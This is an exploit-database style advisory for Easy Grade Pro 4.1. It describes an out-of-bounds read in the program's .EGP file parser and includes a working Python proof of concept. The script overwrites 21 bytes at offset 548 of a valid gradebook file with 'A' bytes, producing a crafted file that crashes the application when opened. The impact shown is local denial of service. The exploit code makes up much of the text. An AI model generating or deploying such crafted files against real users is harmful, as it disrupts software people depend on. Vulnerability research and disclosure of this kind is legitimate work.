============================================================================================================================================= | # Title : Easy Grade Pro 4.1 Malformed .EGP File Triggering Crash | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://archive.org/embed/egp-collection | ============================================================================================================================================= [+] Summary : This Python script generates a malformed .EGP gradebook file designed to trigger a crash in Easy Grade Pro 4.1 by corrupting data at a specific offset within the file. The vulnerability occurs in the application's file‑parsing logic when processing proprietary .EGP files. The parser relies on offsets stored inside the file to reconstruct internal data structures. However, the application does not properly validate that these offsets remain within the bounds of the loaded file buffer. The script works by loading a legitimate .EGP file as a base template and injecting a controlled payload at a predefined offset (548 bytes). The payload consists of repeated 0x41 bytes ("A"), which corrupt internal offset calculations used during parsing. When the crafted file is opened by the application, this corruption can lead to an out‑of‑bounds read, resulting in an access violation and application crash. This Proof‑of‑Concept demonstrates a local denial‑of‑service condition caused by insufficient bounds validation during file parsing. The script performs several safety checks before creating the crafted file, including: Verifying the presence of a valid base .EGP file Ensuring the injection offset is within the file bounds Expanding the file size if the payload exceeds the original length After successful execution, the script generates a new file named: exploit_poc.egp Opening this file in Easy Grade Pro 4.1 may reproduce the crash associated with the vulnerability. [+] POC : import os import sys def generate_exploit(): filename = "exploit_poc.egp" base_file = "base.egp" try: if not os.path.exists(base_file): print("[-] Base EGP file not found. Please place a valid 'base.egp' in the same directory.") return with open(base_file, "rb") as f: base_data = bytearray(f.read()) injection_offset = 548 payload_size = 21 payload_char = b"\x41" # "A" if injection_offset >= len(base_data): print("[-] Injection offset is outside file size.") return if injection_offset + payload_size > len(base_data): print("[!] Payload exceeds file size, resizing file...") base_data.extend(b"\x00" * ((injection_offset + payload_size) - len(base_data))) payload = payload_char * payload_size base_data[injection_offset:injection_offset + payload_size] = payload with open(filename, "wb") as f: f.write(base_data) print("[+] Exploit file created successfully") print(f"[+] Output File : {filename}") print(f"[+] Injection Offset : {injection_offset}") print(f"[+] Payload Size : {payload_size} bytes") print("[!] Open the file using Easy Grade Pro 4.1 to test the crash.") except Exception as e: print(f"[-] Error creating exploit file: {e}") if __name__ == "__main__": generate_exploit() summary en titel Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================